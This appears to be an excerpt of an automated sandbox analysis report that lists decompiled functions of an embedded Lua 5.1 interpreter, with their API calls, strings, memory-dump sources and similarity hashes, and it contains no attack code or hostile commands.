Download Yara Rule

C-Code - Quality: 100%

			E100160A0(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _t7;

				_t11 = __eflags;
				_t7 = __ecx;
				_t8 = _a4;
				E1000F6F0(_a4, "string", 0x100179b8);
				E10001B90(_t7, __eflags, _t8, 0xffffffff, "gmatch");
				E10001DD0(_t7, _t11, _t8, 0xfffffffe, "gfind");
				E100160E0(_t8);
				return 1;
			}

0x100160a0
0x100160a0
0x100160a1
0x100160b0
0x100160bd
0x100160ca
0x100160d0
0x100160de

APIs

luaL_register.LUA5.1(?,string,100179B8), ref: 100160B0

Part of subcall function 1000F6F0: luaL_openlib.LUA5.1(?,?,?,00000000), ref: 1000F701

lua_getfield.LUA5.1(?,000000FF,gmatch,?,string,100179B8), ref: 100160BD

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_setfield.LUA5.1(?,000000FE,gfind,?,000000FF,gmatch,?,string,100179B8), ref: 100160CA

Part of subcall function 10001DD0: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001DFA

Part of subcall function 100160E0: lua_createtable.LUA5.1(?,00000000,00000001,?,100160D5,?,?,000000FE,gfind,?,000000FF,gmatch,?,string,100179B8), ref: 100160EA
Part of subcall function 100160E0: lua_pushlstring.LUA5.1(?,1001AB10,00000000,?,00000000,00000001,?,100160D5,?,?,000000FE,gfind,?,000000FF,gmatch,?), ref: 100160F7
Part of subcall function 100160E0: lua_pushvalue.LUA5.1(?,000000FE,?,1001AB10,00000000,?,00000000,00000001,?,100160D5,?,?,000000FE,gfind,?,000000FF), ref: 100160FF
Part of subcall function 100160E0: lua_setmetatable.LUA5.1(?,000000FE,?,000000FE,?,1001AB10,00000000,?,00000000,00000001,?,100160D5,?,?,000000FE,gfind), ref: 10016107
Part of subcall function 100160E0: lua_settop.LUA5.1(?,000000FE,?,000000FE,?,000000FE,?,1001AB10,00000000,?,00000000,00000001,?,100160D5,?,?), ref: 1001610F
Part of subcall function 100160E0: lua_pushvalue.LUA5.1(?,000000FE,?,000000FE,?,000000FE,?,000000FE,?,1001AB10,00000000,?,00000000,00000001,?,100160D5), ref: 10016117
Part of subcall function 100160E0: lua_setfield.LUA5.1(?,000000FE,__index,?,000000FE,?,000000FE,?,000000FE,?,000000FE,?,1001AB10,00000000,?,00000000), ref: 10016124
Part of subcall function 100160E0: lua_settop.LUA5.1(?,000000FE), ref: 1001612F

Strings

gmatch, xrefs: 100160B5
gfind, xrefs: 100160C2
string, xrefs: 100160AA

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: S_newlstr.lua_pushvalue.lua_setfield.lua_settop.$L_openlib.L_register.lua_createtable.lua_getfield.lua_pushlstring.lua_setmetatable.
String ID: gfind$gmatch$string
API String ID: 1161534774-3707504225
Opcode ID: 4f66372067039b9f72e5fa2c589e089aaae015d6457d7e8cf7457cf0e7444ee7
Instruction ID: 09a7780e9b321fff0b3bfd204c2e32ee8d8600a2e0590c20f4868746b6c71fff
Opcode Fuzzy Hash: 4f66372067039b9f72e5fa2c589e089aaae015d6457d7e8cf7457cf0e7444ee7
Instruction Fuzzy Hash: 40D0C93A44E83235A502E2197C02EDF2149DF5B2B1F240715B6247E1EB9F79F6C252EE

Uniqueness

Uniqueness Score: -1.00%

Function 10012D10, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10012D10(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _t6;

				_t10 = __eflags;
				_t6 = __ecx;
				_t7 = _a4;
				E1000F310(__eflags, _a4, "FILE*");
				E100013D0(__eflags, _t7, 0xffffffff);
				E10001DD0(_t6, _t10, _t7, 0xfffffffe, "__index");
				return E1000F6F0(_t7, 0, 0x10017778);
			}

0x10012d10
0x10012d10
0x10012d11
0x10012d1b
0x10012d23
0x10012d30
0x10012d46

APIs

luaL_newmetatable.LUA5.1(?,FILE*,?,10012BBB,?), ref: 10012D1B

Part of subcall function 1000F310: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 1000F321
Part of subcall function 1000F310: lua_type.LUA5.1(?,000000FF,?,FFFFD8F0,?), ref: 1000F329

lua_pushvalue.LUA5.1(?,000000FF,?,FILE*,?,10012BBB,?), ref: 10012D23
lua_setfield.LUA5.1(?,000000FE,__index,?,000000FF,?,FILE*,?,10012BBB,?), ref: 10012D30

Part of subcall function 10001DD0: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001DFA

luaL_register.LUA5.1(?,00000000,10017778,?,000000FE,__index,?,000000FF,?,FILE*,?,10012BBB,?), ref: 10012D3D

Part of subcall function 1000F6F0: luaL_openlib.LUA5.1(?,?,?,00000000), ref: 1000F701

Strings

FILE*, xrefs: 10012D15
__index, xrefs: 10012D28

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_newmetatable.L_openlib.L_register.S_newlstr.lua_getfield.lua_pushvalue.lua_setfield.lua_type.
String ID: FILE*$__index
API String ID: 3703984340-534779304
Opcode ID: e9d7c9237462cb1040b306f61ccace929e0af6bca4f5b006b9903f01ac200f0c
Instruction ID: a1de701b51c824b365423c049d39f4ca8e9f883d9520b5e851e546e32da0eb21
Opcode Fuzzy Hash: e9d7c9237462cb1040b306f61ccace929e0af6bca4f5b006b9903f01ac200f0c
Instruction Fuzzy Hash: 6ED0C93948A53131E805E6297C42FDE2198DF472B0F200705F624399DB8F6976C211EE

Uniqueness

Uniqueness Score: -1.00%

Function 00401150, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401150() {
				intOrPtr* _t7;

				_t7 = __imp____iob_func;
				fprintf( *_t7("Lua 5.1.4  Copyright (C) 1994-2008 Lua.org, PUC-Rio") + 0x40, "%s\n");
				return fflush( *_t7() + 0x40);
			}

0x00401151
0x00401167
0x0040117d

APIs

__iob_func.MSVCR80 ref: 00401161
fprintf.MSVCR80 ref: 00401167
__iob_func.MSVCR80 ref: 0040116D
fflush.MSVCR80 ref: 00401173

Strings

%s, xrefs: 0040115C

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: __iob_func$fflushfprintf
API String ID: 3588425135-527811110
Opcode ID: 43d166c97d05714eb673129b745e5b67f945f16672ef17e55a233e9e0b6b6e86
Instruction ID: bf0afd1d2c5a4a70a07079607eaa99518e6590d1bf2fb26e1b53f30c15ecf297
Opcode Fuzzy Hash: 43d166c97d05714eb673129b745e5b67f945f16672ef17e55a233e9e0b6b6e86
Instruction Fuzzy Hash: 02D012B29111246BE7006F79BD4EB863E1C6D0120B3044463F446F72D5D978EE508AEC

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF80, Relevance: 9.1, APIs: 6, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CF80() {
				intOrPtr _t38;
				intOrPtr _t41;
				intOrPtr _t43;
				signed int _t44;
				signed int _t46;
				intOrPtr _t49;
				signed int _t52;
				signed int _t53;
				void* _t54;
				signed int _t58;
				intOrPtr _t72;
				signed int _t73;
				signed int _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				_t71 =  *((intOrPtr*)(_t75 + 0x14));
				_t52 = E1000CCF0( *((intOrPtr*)(_t75 + 0x14)));
				_t76 = _t75 + 4;
				_t2 = _t52 + 1; // 0x1
				if(_t2 > 0x3fffffff) {
					_t38 = E100088B0( *_t71);
					_t77 = _t76 + 4;
				} else {
					_t38 = E100088D0( *_t71, 0, 0, _t52 * 4);
					_t77 = _t76 + 0x10;
				}
				_t72 =  *((intOrPtr*)(_t77 + 0x18));
				 *((intOrPtr*)(_t72 + 0x14)) = _t38;
				 *(_t72 + 0x30) = _t52;
				E1000CCC0(_t71, _t38, _t52 * 4);
				_t73 = E1000CCF0(_t71);
				_t78 = _t77 + 0x10;
				_t8 = _t73 + 1; // 0x1
				if(_t8 > 0x15555555) {
					_t41 = E100088B0( *_t71);
					_t79 = _t78 + 4;
				} else {
					_t41 = E100088D0( *_t71, 0, 0, _t73 + _t73 * 2 << 2);
					_t79 = _t78 + 0x10;
				}
				 *((intOrPtr*)(_t72 + 0x18)) = _t41;
				 *(_t72 + 0x38) = _t73;
				if(_t73 > 0) {
					_t46 = 0;
					_t58 = _t73;
					do {
						_t46 = _t46 + 0xc;
						_t58 = _t58 - 1;
						 *((intOrPtr*)(_t46 +  *((intOrPtr*)(_t72 + 0x18)) - 0xc)) = 0;
					} while (_t58 != 0);
					if(_t73 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *((intOrPtr*)(_t72 + 0x18)))) = E1000CD30(_t71);
							 *((intOrPtr*)(_t54 +  *((intOrPtr*)(_t72 + 0x18)) + 4)) = E1000CCF0(_t71);
							_t49 = E1000CCF0(_t71);
							_t79 = _t79 + 0xc;
							 *((intOrPtr*)(_t54 +  *((intOrPtr*)(_t72 + 0x18)) + 8)) = _t49;
							_t54 = _t54 + 0xc;
							_t73 = _t73 - 1;
						} while (_t73 != 0);
					}
				}
				_t53 = E1000CCF0(_t71);
				_t80 = _t79 + 4;
				_t24 = _t53 + 1; // 0x1
				if(_t24 > 0x3fffffff) {
					_t43 = E100088B0( *_t71);
					_t81 = _t80 + 4;
				} else {
					_t43 = E100088D0( *_t71, 0, 0, _t53 * 4);
					_t81 = _t80 + 0x10;
				}
				 *((intOrPtr*)(_t72 + 0x1c)) = _t43;
				_t44 = 0;
				 *(_t72 + 0x24) = _t53;
				if(_t53 > 0) {
					do {
						_t44 = _t44 + 1;
						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x1c)) + _t44 * 4 - 4)) = 0;
					} while (_t44 < _t53);
				}
				_t74 = 0;
				if(_t53 > 0) {
					do {
						_t44 = E1000CD30(_t71);
						_t81 = _t81 + 4;
						 *( *((intOrPtr*)(_t72 + 0x1c)) + _t74 * 4) = _t44;
						_t74 = _t74 + 1;
					} while (_t74 < _t53);
				}
				return _t44;
			}

0x1000cf84
0x1000cf8e
0x1000cf90
0x1000cf93
0x1000cf9b
0x1000cfb9
0x1000cfbe
0x1000cf9d
0x1000cfac
0x1000cfb1
0x1000cfb1
0x1000cfc1
0x1000cfcf
0x1000cfd2
0x1000cfd5
0x1000cfe0
0x1000cfe2
0x1000cfe5
0x1000cfee
0x1000d00c
0x1000d011
0x1000cff0
0x1000cfff
0x1000d004
0x1000d004
0x1000d016
0x1000d019
0x1000d01c
0x1000d01e
0x1000d020
0x1000d022
0x1000d025
0x1000d028
0x1000d029
0x1000d029
0x1000d035
0x1000d037
0x1000d039
0x1000d043
0x1000d04f
0x1000d053
0x1000d05b
0x1000d05e
0x1000d062
0x1000d065
0x1000d065
0x1000d039
0x1000d035
0x1000d06e
0x1000d070
0x1000d073
0x1000d07c
0x1000d09a
0x1000d09f
0x1000d07e
0x1000d08d
0x1000d092
0x1000d092
0x1000d0a2
0x1000d0a5
0x1000d0a9
0x1000d0ac
0x1000d0ae
0x1000d0b1
0x1000d0b4
0x1000d0b4
0x1000d0ae
0x1000d0be
0x1000d0c2
0x1000d0c4
0x1000d0c5
0x1000d0cd
0x1000d0d0
0x1000d0d3
0x1000d0d4
0x1000d0c4
0x1000d0dc

APIs

luaM_realloc_.LUA5.1(?,00000000,00000000,?,?), ref: 1000CFAC
luaM_toobig.LUA5.1(00000001,?), ref: 1000CFB9
luaM_realloc_.LUA5.1(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 1000CFFF
luaM_toobig.LUA5.1(00000001,?,?,?,?,?,?), ref: 1000D00C
luaM_realloc_.LUA5.1(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 1000D08D
luaM_toobig.LUA5.1(00000001,?,?,?,?,?,?,?,?), ref: 1000D09A

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: M_realloc_.M_toobig.
String ID:
API String ID: 1500966413-0
Opcode ID: f7fb4493ac0a564b0d2e7db0442d5a01001dd9fa4724d81c6bc854a2c5ca9ff1
Instruction ID: 50dc4feb0d7e6572e1a539a9202ee2fd4fc0c224850cebde236f24e70808c51d
Opcode Fuzzy Hash: f7fb4493ac0a564b0d2e7db0442d5a01001dd9fa4724d81c6bc854a2c5ca9ff1
Instruction Fuzzy Hash: E54195745003055BF320EF64D8C1F6BB3A9EB80694F50492EE9098725BEB75FA16CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 100159D0, Relevance: 9.1, APIs: 6, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E100159D0(void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				void* __esi;
				intOrPtr _t23;
				signed int _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				void* _t42;
				void* _t60;
				intOrPtr* _t62;
				intOrPtr _t65;
				void* _t67;
				void* _t68;
				void* _t74;

				_t74 = __fp0;
				_t42 = E100016F0(__eflags,  *((intOrPtr*)(_a4 + 8)), 3,  &_v4);
				_t23 = _v4;
				_t68 = _t67 + 0xc;
				_t60 = 0;
				if(_t23 <= 0) {
					return _t23;
				} else {
					_t65 = _a12;
					_t62 = _a8;
					do {
						if( *((char*)(_t60 + _t42)) == 0x25) {
							_t24 = __imp____mb_cur_max;
							_t60 = _t60 + 1;
							__eflags =  *_t24 - 1;
							if( *_t24 <= 1) {
								_t24 =  *( *__imp___pctype) & 0x00000004;
								__eflags = _t24;
							} else {
								__imp___isctype(0, 4);
								_t68 = _t68 + 8;
							}
							__eflags = _t24;
							if(_t24 != 0) {
								_t27 =  *((intOrPtr*)(_t60 + _t42));
								__eflags = _t27 - 0x30;
								if(_t27 != 0x30) {
									__eflags = _t27 - 0x31;
									E10015550(_t74, _a4, _t27 - 0x31, _t65, _a16);
									E1000FB70(_t62, __eflags, _t62);
									_t68 = _t68 + 0x14;
								} else {
									E1000FAC0(_t62, _t65, _a16 - _t65);
									_t68 = _t68 + 0xc;
								}
							} else {
								__eflags =  *_t62 - _t62 + 0x20c;
								if(__eflags >= 0) {
									E1000F9E0(__eflags, _t62);
									_t68 = _t68 + 4;
								}
								 *((char*)( *_t62)) =  *((intOrPtr*)(_t60 + _t42));
								 *_t62 =  *_t62 + 1;
							}
						} else {
							_t72 =  *_t62 - _t62 + 0x20c;
							if( *_t62 >= _t62 + 0x20c) {
								E1000F9E0(_t72, _t62);
								_t68 = _t68 + 4;
							}
							 *((char*)( *_t62)) =  *((intOrPtr*)(_t60 + _t42));
							 *_t62 =  *_t62 + 1;
						}
						_t31 = _v4;
						_t60 = _t60 + 1;
					} while (_t60 < _t31);
					return _t31;
				}
			}

0x100159d0
0x100159e7
0x100159e9
0x100159ed
0x100159f0
0x100159f4
0x10015ad3
0x100159fa
0x100159fb
0x10015a00
0x10015a04
0x10015a08
0x10015a30
0x10015a35
0x10015a36
0x10015a39
0x10015a5d
0x10015a5d
0x10015a3b
0x10015a43
0x10015a49
0x10015a49
0x10015a60
0x10015a62
0x10015a87
0x10015a8a
0x10015a8c
0x10015aad
0x10015ab3
0x10015ab9
0x10015abe
0x10015a8e
0x10015a97
0x10015a9c
0x10015a9c
0x10015a64
0x10015a6c
0x10015a6e
0x10015a71
0x10015a76
0x10015a76
0x10015a7e
0x10015a83
0x10015a83
0x10015a0a
0x10015a12
0x10015a14
0x10015a17
0x10015a1c
0x10015a1c
0x10015a24
0x10015a29
0x10015a29
0x10015ac1
0x10015ac5
0x10015ac6
0x00000000
0x10015acf

APIs

lua_tolstring.LUA5.1(?,00000003,?,00000000,?,?,100158DE,?,?,?,?,00000000,00000000,?,00000000,00000000), ref: 100159E2
luaL_prepbuffer.LUA5.1(?,?,?,?,?,?,00000000,00000000,?,00000000,00000000), ref: 10015A17
_isctype.MSVCRT ref: 10015A43
luaL_prepbuffer.LUA5.1(?,?,?,?,?,?,00000000,00000000,?,00000000,00000000), ref: 10015A71
luaL_addlstring.LUA5.1(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,00000000), ref: 10015A97

Part of subcall function 1000FAC0: luaL_prepbuffer.LUA5.1(?,?,00000000,?,?,1000FB2D,?,?,?,?,1000F8CA,?,?), ref: 1000FAE5

luaL_addvalue.LUA5.1(?,?,-00000031,?,?,?,?,?,?,?,00000000,00000000,?,00000000,00000000), ref: 10015AB9

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_prepbuffer.$L_addlstring.L_addvalue._isctypelua_tolstring.
String ID:
API String ID: 537332849-0
Opcode ID: a8fa6410c0ab1ed7bae6a5c46820549d59d6a42aa57ecd7a8257957dec36a5f5
Instruction ID: 8618e358b3d80aa06ee3a4735856ef46901765415b71dec9a9a7fc33e4386299
Opcode Fuzzy Hash: a8fa6410c0ab1ed7bae6a5c46820549d59d6a42aa57ecd7a8257957dec36a5f5
Instruction Fuzzy Hash: 5931E375244241EFD312CF28CCC096AB7E5EF8A385B584A5CE5C58F206D732F845C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 100122F0, Relevance: 9.1, APIs: 6, Instructions: 58
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E100122F0(void* __ebx, void* __edi, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, char* _a12) {
				void* _t4;
				struct _IO_FILE** _t11;
				struct _IO_FILE* _t13;
				void* _t17;
				char* _t19;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t27;

				_t32 = __fp0;
				_t21 = _a4;
				_t4 = E10001410(__eflags, _a4, 1);
				_t22 = _a8;
				_t24 = _t23 + 8;
				_t29 = _t4;
				if(_t4 > 0) {
					_t19 = E100016F0(_t29, _t21, 1, 0);
					_t26 = _t24 + 0xc;
					if(_t19 == 0) {
						E10012010(__eflags, __fp0, _t21);
						E100013D0(__eflags, _t21, 1);
						goto L5;
					} else {
						_t11 = E100121F0(_t21);
						_t13 = fopen(_t19, _a12);
						_t27 = _t26 + 0xc;
						 *_t11 = _t13;
						_t31 = _t13;
						_pop(_t17);
						if(_t13 == 0) {
							E10012380(_t13, _t17, _t21, 1, _t19);
							L5:
							_t27 = _t26 + 0xc;
						}
					}
					E10001EB0(_t31, _t21, 0xffffd8ef, _t22);
					_t24 = _t27 + 0xc;
				}
				E10001C30(_t31, _t32, _t21, 0xffffd8ef, _t22);
				return 1;
			}

0x100122f0
0x100122f2
0x100122f9
0x100122fe
0x10012302
0x10012305
0x10012307
0x10012314
0x10012316
0x1001231b
0x10012348
0x10012350
0x00000000
0x1001231d
0x1001231f
0x1001232c
0x10012332
0x10012335
0x10012337
0x10012339
0x1001233a
0x10012340
0x10012355
0x10012355
0x10012355
0x1001233a
0x1001235f
0x10012364
0x10012367
0x1001236f
0x1001237e

APIs

lua_type.LUA5.1(?,00000001,?,?,100122E1,?,00000001,10019B5C), ref: 100122F9
lua_tolstring.LUA5.1(?,00000001,00000000), ref: 1001230F
fopen.MSVCRT ref: 1001232C

Part of subcall function 10012380: _errno.MSVCRT ref: 10012381
Part of subcall function 10012380: strerror.MSVCRT ref: 1001238A
Part of subcall function 10012380: lua_pushfstring.LUA5.1(?,%s: %s,?,00000000), ref: 100123A0
Part of subcall function 10012380: lua_tolstring.LUA5.1(?,000000FF,00000000,?,%s: %s,?,00000000), ref: 100123AA
Part of subcall function 10012380: luaL_argerror.LUA5.1(?,?,00000000,?,000000FF,00000000,?,%s: %s,?,00000000), ref: 100123B6

lua_pushvalue.LUA5.1(?,00000001,?), ref: 10012350
lua_rawseti.LUA5.1(?,FFFFD8EF,?), ref: 1001235F

Part of subcall function 100121F0: lua_newuserdata.LUA5.1(?,00000004,?,?,10012D5C,?,?,?,10012BF3,?,75974600,00000001,stdin,?,1001A2F0,10017718), ref: 100121F9
Part of subcall function 100121F0: lua_getfield.LUA5.1(?,FFFFD8F0,FILE*,?,00000004,?,?,10012D5C,?,?,?,10012BF3,?,75974600,00000001,stdin), ref: 10012211
Part of subcall function 100121F0: lua_setmetatable.LUA5.1(?,000000FE,?,FFFFD8F0,FILE*,?,00000004,?,?,10012D5C,?,?,?,10012BF3,?,75974600), ref: 10012219

lua_rawgeti.LUA5.1(?,FFFFD8EF,?), ref: 1001236F

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_tolstring.$L_argerror._errnofopenlua_getfield.lua_newuserdata.lua_pushfstring.lua_pushvalue.lua_rawgeti.lua_rawseti.lua_setmetatable.lua_type.strerror
String ID:
API String ID: 3768674814-0
Opcode ID: 11cb38682ff4f062c90974f54079c2b08629239615d30e703ed1528e4737b76f
Instruction ID: 4a51a67e1fd0097592ac0f79a78c018b2c80e3a48640b2e3fd9fb99fee230848
Opcode Fuzzy Hash: 11cb38682ff4f062c90974f54079c2b08629239615d30e703ed1528e4737b76f
Instruction Fuzzy Hash: DD01A77555165037E6129214AC42FCF369DDF86684F040024FA18AA247E66AF7A642EA

Uniqueness

Uniqueness Score: -1.00%

Function 1000F370, Relevance: 9.1, APIs: 6, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000F370(void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __ebx;
				void* _t4;
				void* _t7;
				void* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t16;
				void* _t17;
				void* _t18;

				_t15 = _a4;
				_t14 = _a8;
				_t4 = E10001810(__eflags, _a4, _a8);
				_t16 = _a12;
				_t12 = _t4;
				_t18 = _t17 + 8;
				_t22 = _t12;
				if(_t12 == 0) {
					L4:
					E1000F180(_t12, _t13, _t15, _t14, _t16);
					__eflags = 0;
					return 0;
				} else {
					_t7 = E10001CC0(_t22, _t15, _t14);
					_t18 = _t18 + 8;
					_t23 = _t7;
					if(_t7 == 0) {
						goto L4;
					} else {
						E10001B90(_t13, _t23, _t15, 0xffffd8f0, _t16);
						_t9 = E10001530(_t23, __fp0, _t15, 0xffffffff, 0xfffffffe);
						_t18 = _t18 + 0x18;
						if(_t9 == 0) {
							goto L4;
						} else {
							E10001160(_t15, 0xfffffffd);
							return _t12;
						}
					}
				}
			}

0x1000f373
0x1000f378
0x1000f37e
0x1000f383
0x1000f387
0x1000f389
0x1000f38c
0x1000f38e
0x1000f3cd
0x1000f3d0
0x1000f3d8
0x1000f3de
0x1000f390
0x1000f392
0x1000f397
0x1000f39a
0x1000f39c
0x00000000
0x1000f39e
0x1000f3a5
0x1000f3af
0x1000f3b4
0x1000f3b9
0x00000000
0x1000f3bb
0x1000f3be
0x1000f3cc
0x1000f3cc
0x1000f3b9
0x1000f39c

APIs

lua_touserdata.LUA5.1(?,?), ref: 1000F37E
lua_getmetatable.LUA5.1(?,?), ref: 1000F392
lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 1000F3A5

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 1000F3AF
lua_settop.LUA5.1(?,000000FD), ref: 1000F3BE
luaL_typerror.LUA5.1(?,?,?), ref: 1000F3D0

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_typerror.S_newlstr.lua_getfield.lua_getmetatable.lua_rawequal.lua_settop.lua_touserdata.
String ID:
API String ID: 4045892701-0
Opcode ID: eaa29c6c229bd4ba965cc7be840cba9639871252a7723a3abd3b9f21d727591a
Instruction ID: d59195d5c59cf0f8a2346cfd1e31cf4d255938569931837547447e2bf4427120
Opcode Fuzzy Hash: eaa29c6c229bd4ba965cc7be840cba9639871252a7723a3abd3b9f21d727591a
Instruction Fuzzy Hash: 89F0962B615225336501915A6C01DEF77CCCFC70F6B15033AF924A228AFB06BB1652F6

Uniqueness

Uniqueness Score: -1.00%

Function 10016CF0, Relevance: 9.0, APIs: 6, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10016CF0(intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				void* __esi;
				char* _t8;

				_t8 = getenv(_a12);
				_t23 = _t8;
				if(_t8 != 0) {
					_t18 = _a4;
					E1000F840(_t16, _a4, E1000F840(_t16, _a4, _t8, 0x1001aadc, 0x1001aae0), 0x1001aad8, _a16);
					E100011B0(__eflags, _a4, 0xfffffffe);
				} else {
					_t16 = _a16;
					_t18 = _a4;
					E10001980(_a16, _a4, _a16);
				}
				E10016D60(_t18, _t18);
				return E10001DD0(_t16, _t23, _t18, 0xfffffffe, _a8);
			}

0x10016cf6
0x10016cff
0x10016d01
0x10016d17
0x10016d38
0x10016d40
0x10016d03
0x10016d03
0x10016d07
0x10016d0d
0x10016d12
0x10016d49
0x10016d5f

APIs

getenv.MSVCRT ref: 10016CF6
lua_pushstring.LUA5.1(?,?), ref: 10016D0D

Part of subcall function 10001980: lua_pushnil.LUA5.1(?), ref: 1000198D

luaL_gsub.LUA5.1(?,00000000,1001AADC,1001AAE0), ref: 10016D27
luaL_gsub.LUA5.1(?,00000000,1001AAD8,?,?,00000000,1001AADC,1001AAE0), ref: 10016D38
lua_remove.LUA5.1(?,000000FE,?,00000000,1001AAD8,?,?,00000000,1001AADC,1001AAE0), ref: 10016D40
lua_setfield.LUA5.1(?,000000FE,?,?), ref: 10016D56

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_gsub.$getenvlua_pushnil.lua_pushstring.lua_remove.lua_setfield.
String ID:
API String ID: 941839230-0
Opcode ID: a2801ae4ba04aa6ba88c583bbb9861bc675b991a8601491d6bd53ddd7d1877af
Instruction ID: d9ee5809deeb4d5c9fa2668e28b6b948c8900116cc0812c53cdaae3d0c4ecef9
Opcode Fuzzy Hash: a2801ae4ba04aa6ba88c583bbb9861bc675b991a8601491d6bd53ddd7d1877af
Instruction Fuzzy Hash: 4CF0B4B99091217BA201D754ED02CEF32ACDF8A1A4F044608FA546B542EB30FDC183E7

Uniqueness

Uniqueness Score: -1.00%

Function 00993050, Relevance: 9.0, APIs: 6, Instructions: 39COMMON

Download Yara Rule

APIs

